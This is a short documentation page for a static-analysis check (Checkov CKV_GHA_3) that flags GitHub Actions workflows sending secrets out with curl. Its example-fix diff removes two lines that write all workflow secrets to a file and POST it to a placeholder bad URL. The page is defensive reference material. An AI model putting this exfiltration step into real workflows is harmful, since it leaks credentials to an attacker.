Suspicious use of curl with secrets

Error:Curl is being with secrets
Bridgecrew Policy ID: BC_REPO_GITHUB_ACTION_3
Checkov Check ID: CKV_GHA_3
Severity: LOW

Curl is being with secrets

If a secret is able to be obtained in a workflow and a bad actor can modify the GitHub Action, they can send the secret to a website they own via curl.

Example Fix

Block code and remove code that attempts to exfiltrate secrets.

       run:  |
-         echo "${{ toJSON(secrets) }}" > .secrets
-         curl -X POST -s --data "@.secrets" <BADURL > /dev/null

Did this page help you?